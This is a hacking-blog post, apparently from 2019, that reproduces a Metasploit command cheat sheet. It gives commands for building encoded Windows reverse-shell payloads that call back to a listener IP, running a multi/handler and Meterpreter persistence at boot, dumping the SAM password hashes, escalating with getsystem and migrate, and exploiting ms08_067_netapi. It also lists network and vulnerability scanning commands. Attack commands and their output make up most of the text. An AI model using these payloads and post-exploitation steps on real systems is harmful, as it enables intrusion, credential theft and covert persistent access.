Dragon
  • 一个纯白的黑客网站,一直在努力,apt的路上,更精彩!
adminAdmin  2019-02-18 00:11 lsh4ck's Blog 隐藏边栏 |   抢沙发  289 
文章评分 0 次,平均分 0.0

Metasploit Framework - Payload Encoding

List all available payloads and search for windows reverse tcp shellsmsfpayload -l | grep windows | grep shell | grep reverse | tcp
List available encoders 
msfencode -l 
Reverse self-contained (not staged) command shell: 341 bytes
msfpayload windows/shell_reverse_tcp LHOST=192.168.6.1 R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0b\x0d\x90' -t c
msfpayload windows/shell_reverse_tcp LHOST=192.168.6.1 R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0b\x0d\x90' -t c

Windows Command Shell, reverse Ordinal TCP Stager (Np NX or Win7)

Use msf multi/handler to listen and upload remainder of the shellcode (stage 2)

msfpayload windows/shell/reverse_ord_tcp LHOST=192.168.6.1 R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0b\x0d\x90' -t c

Generic Syntax

msfpayload <payload> <options> <output>| ./msfencode -e <encoder> -b <bad bytes> -t <output format>

Importing  external scan results into the database

Importing - Nmap scans into the MSF database
msf> db_import /path/filename.xml
(keep in mind externally scanning and importing xml results can be faster than executing nmap within msf (below))
Import - Nessus scans into the MSF database
msf> db_import /path/filename.nessus

Import - NeXpose scans into the MSF database

msf> db_import /path/filename.xml

Running an Nmap scan within MSF to add to the database

msf> db_nmap -sS -A <hosts>
or
msf> db_nmap -sSV -O -PN --send-ip <hosts>
Running NeXpose from within MSF
msf> load nexpose
msf> nexpose_connect username:password@host[:port]
msf> nexpose_scan

Running Nessus from within MSF

msf> load nessus
msf> nessus_connect username:password@host[:port]
msf> nessus_policy_list
msf> nessus_scan_new
msf> nessus_scan_status
msf> nessus_report_list
msf> nessus_report_get

Retrieving data from the database from within MSF

List of discovered services
msf> db_services
or
List of discovered hosts
msf> db_hosts
or
List of discovered hosts with additional columns "address" and "operating system"
msf> db_hosts -c address,os_flavor
or
List of discovered vulnerabilities (e.g. as imported from vulnerability scanner like nessus)
msf> db_vulns

Retrieving data from the database from within MySQL

 Retrieve hosts and associated services:mysql> select
address,hosts.name,os_name,os_flavor,os_sp,hosts.updated_at,port,proto,services.name,services.info from hosts,services where hosts.id=services.host_id;
Retrieve matching 'pc21-97.*' hosts and associated services:
mysql> select address,hosts.name,os_name,os_flavor,os_sp,hosts.updated_at,port,proto,services.name,services.info from hosts,services where hosts.name LIKE 'pc21-97.%' and hosts.id=services.host_id;
Retrieve matching '*.97' hosts and associated services:
mysql> select address,hosts.name,os_name,os_flavor,os_sp,hosts.updated_at,port,proto,services.name,services.info from hosts,services where hosts.address LIKE '%.97' and hosts.id=services.host_id;

Service Scanners - SSH Server Banner Scanner

msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set RHOSTS 192.168.1.0/24
msf auxiliary(ssh_version) > set THREADS 20
msf auxiliary(ssh_version) > run
[*] 192.168.1.22 :22, SSH server version: SSH-2.0-OpenSSH_5.1p1 Debian-3ubuntu1

Service Scanners - MSSQL Scanner

msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > set RHOSTS 192.168.1.0/24
msf auxiliary(mssql_ping) > set THREADS 20
msf auxiliary(mssql_ping) > run
[*] 192.168.1.143 SQL Server information for :
[*] 192.168.1.143 ServerName = V-XPSP2-BARE
[*] 192.168.1.143 InstanceName = SQLEXPRESS
[*] 192.168.1.143 IsClustered = No
[*] 192.168.1.143 Version = 10.0.1600.22
[*] 192.168.1.143 tcp = 1433
Service Scanners - SMB Version Scanner
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS
msf auxiliary(smb_version) > run
[*] 192.168.1.143 is running Windows XP Service Pack 2 (language: English)
(name:HOSTNAME) (domain:WORKGROUP)

Service Scanners -  SNMP login scanner

msf> use auxiliary/scanner/snmp/snmp_login

 

Meterpreter Scripts - Persistence

meterpreter > run persistence -X -i 50 -p 443 -r
at boot time (-X), interval seconds (-i ), port (-p 443) and reverse (-r )
msf> use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 443
msf exploit(handler) > set LHOST  192.168.1.1
msf exploit(handler) > exploit
[*] Meterpreter session 2 opened (:443 -> :1120)

Metasploit Meterpreter Post Exploitation Modules

Hashdump - The 'hashdump' post module will dump the contents of the SAM database.meterpreter > run post/windows/gather/hashdump or meterpreter > hashdump
Occasionally, the effective process does not have access or permission to retrieve the hashes - even if the meterpreter running as a SYSTEM or ADMINISTRATOR user.
Access can sometimes be achieved by ensuring all permissions are granted to the process, migrating to a process spawned by a SYSTEM user or in the case of x64 systems, making sure that the running process is natively x64 bit (e.g. notepad.exe) and not compatible 32 bit.

List running processes and owners (where visible by the current user)
meterpreter > ps
Get system user if necessary and if possible 
meterpreter > getsystem
Get all missing/available privileges for the current process 
meterpreter > getprivs
Migrate to new process and attempt again  

meterpreter > migrate


Meterpreter Scripts - System Scraper
meterpreter > run scraper

Upgrading command shell to meterpreter shell
msf > use windows/smb/ms08_067_netapi
... ... ...
[*] Command shell session 1 opened (:8080 -> :1032)
[*] Session 1 created in the background.
msf exploit(ms08_067_netapi) > sessions -u 1
... ... ...
[*] Meterpreter session 2 opened (:8080 -> :1044)
msf exploit(ms08_067_netapi) > sessions -i 2


本文为原创文章,版权归所有,欢迎分享本文,转载请保留出处!

admin
Admin 关注:0    粉丝:6
这个人很懒,什么都没写

发表评论

表情 链接 私密 格式 签到

切换注册

登录

短信快捷登录 忘记密码 ?

切换登录

注册

验证码

×

感谢您对admin的支持,么么哒~

支付宝打赏 admin
请扫码随意打赏

打开支付宝扫一扫,即可进行扫码打赏哦

lsh4ck's Blog - Hacking is endless! Focus on network security!

扫一扫二维码分享

无觅相关文章插件,快速提升流量